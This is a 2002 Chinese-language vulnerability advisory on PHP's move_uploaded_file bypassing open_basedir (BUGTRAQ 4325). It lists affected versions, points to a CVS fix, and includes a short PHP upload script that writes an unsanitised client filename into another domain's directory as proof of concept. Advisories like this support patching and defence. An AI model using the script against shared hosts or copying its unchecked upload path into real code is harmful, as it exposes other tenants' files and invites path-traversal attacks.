|
|
PHP Move_Uploaded_File Open_Basedir欺骗漏洞
发布时间:2002-03-23
更新时间:2002-03-23
严重程度:中
威胁程度:读取受限文件
错误类型:访问验证错误
利用方式:服务器模式
BUGTRAQ ID:4325
受影响系统PHP PHP 3.0
PHP PHP 3.0.18
+ Conectiva Linux 0.0ecommerce
+ Conectiva Linux 0.0graficas
+ Conectiva Linux 5.0
+ Conectiva Linux 5.1
+ Conectiva Linux 6.0
+ Debian Linux 2.2
+ Debian Linux 2.2 68k
+ Debian Linux 2.2 alpha
+ Debian Linux 2.2 arm
+ Debian Linux 2.2 IA-32
+ Debian Linux 2.2 powerpc
+ Debian Linux 2.2 sparc
+ RedHat Linux 6.2
+ RedHat Linux 6.2 alpha
+ RedHat Linux 6.2 i386
+ RedHat Linux 6.2 sparc
+ Trustix Secure Linux 1.1
+ Trustix Secure Linux 1.2
PHP PHP 3.0.17
+ S.u.S.E. Linux 7.0
+ S.u.S.E. Linux 7.0alpha
+ S.u.S.E. Linux 7.0i386
+ S.u.S.E. Linux 7.0ppc
+ S.u.S.E. Linux 7.0sparc
+ S.u.S.E. Linux 7.1
+ S.u.S.E. Linux 7.1alpha
+ S.u.S.E. Linux 7.1ppc
+ S.u.S.E. Linux 7.1sparc
+ S.u.S.E. Linux 7.1x86
+ Trustix Secure Linux 1.1
+ Trustix Secure Linux 1.2
PHP PHP 3.0.16
+ S.u.S.E. Linux 6.4
+ S.u.S.E. Linux 6.4alpha
+ S.u.S.E. Linux 6.4i386
+ S.u.S.E. Linux 6.4ppc
PHP PHP 3.0.15
PHP PHP 3.0.14
PHP PHP 3.0.13
PHP PHP 3.0.12
PHP PHP 3.0.11
PHP PHP 3.0.10
PHP PHP 3.0.1
PHP PHP 3.0.2
PHP PHP 3.0.3
PHP PHP 3.0.4
PHP PHP 3.0.5
PHP PHP 3.0.6
PHP PHP 3.0.7
PHP PHP 3.0.8
PHP PHP 3.0.9
PHP PHP 3.0.10
PHP PHP 3.0.11
PHP PHP 3.0.12
PHP PHP 3.0.13
PHP PHP 3.0.16
PHP PHP 4.0
PHP PHP 4.0.1pl2
PHP PHP 4.0.1pl1
PHP PHP 4.0.1
PHP PHP 4.0.2
PHP PHP 4.0.3pl1
+ S.u.S.E. Linux 6.4
+ S.u.S.E. Linux 6.4alpha
+ S.u.S.E. Linux 6.4i386
+ S.u.S.E. Linux 6.4ppc
PHP PHP 4.0.3
+ Debian Linux 2.2
+ Debian Linux 2.2 68k
+ Debian Linux 2.2 alpha
+ Debian Linux 2.2 arm
+ Debian Linux 2.2 IA-32
+ Debian Linux 2.2 powerpc
+ Debian Linux 2.2 sparc
PHP PHP 4.0.4
+ Conectiva Linux 6.0
+ Guardian Digital Engarde Secure Linux 1.0.1
+ S.u.S.E. Linux 7.0
+ S.u.S.E. Linux 7.0alpha
+ S.u.S.E. Linux 7.0i386
+ S.u.S.E. Linux 7.0ppc
+ S.u.S.E. Linux 7.0sparc
+ S.u.S.E. Linux 7.1
+ S.u.S.E. Linux 7.1alpha
+ S.u.S.E. Linux 7.1ppc
+ S.u.S.E. Linux 7.1sparc
+ S.u.S.E. Linux 7.1x86
PHP PHP 4.0.5
PHP PHP 4.0.6
+ HP Secure OS software for Linux 1.0
+ RedHat Linux 7.0
+ RedHat Linux 7.0 alpha
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.1
+ RedHat Linux 7.1 alpha
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.2
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.2 ia64
+ S.u.S.E. Linux 7.2
+ S.u.S.E. Linux 7.2i386
+ S.u.S.E. Linux 7.3
+ S.u.S.E. Linux 7.3i386
+ S.u.S.E. Linux 7.3ppc
+ S.u.S.E. Linux 7.3sparc
+ Trustix Secure Linux 1.5
PHP PHP 4.0.7RC3
PHP PHP 4.0.7RC2
PHP PHP 4.0.7RC1
PHP PHP 4.0.7
PHP PHP 4.1.0
PHP PHP 4.1.1
+ Conectiva Linux 7.0
PHP PHP 4.1.2 详细描述
PHP是服务器端脚本语言,实际用来嵌入到HTML文件,使用在多种操作系统下。
其中PHP的move_uploaded_file函数缺少对open_basedir的检查,可以导致这个函数用来执行open_basedir设置指定目录之外的文件操作。
测试代码
<?
$file = $HTTP_POST_FILES['file']['name'];
$type = $HTTP_POST_FILES['file']['type'];
$size = $HTTP_POST_FILES['file']['size'];
$temp = $HTTP_POST_FILES['file']['tmp_name'];
$size_limit = "100000"; // set size limit in bytes
if ($file){
if ($size < $size_limit){
move_uploaded_file($temp,
"/domains/somebodyelse.org/public_html/www/test/".$file);
echo "The file <tt>$file</tt> was sucessfully
uploaded";
} else {
echo "Sorry, your file exceeds the size limit of $size_limit
bytes";
}}
echo "
<form enctype='multipart/form-data' action=$PHP_SELF method=post>
Upload a file: <input name='file' type='file'>
<input type='submit' value='Upload'>
</form>
";
?>
解决方案
可以通过PHP的CVS处得到升级修补。
相关信息
"Tozz" <tozz@embrace.selwerd.nl>.
参考:http://online.securityfocus.com/archive/1/262999
http://online.securityfocus.com/archive/1/263259
http://online.securityfocus.com/archive/1/263657
相关主页:http://www.php.net/support.php3
|
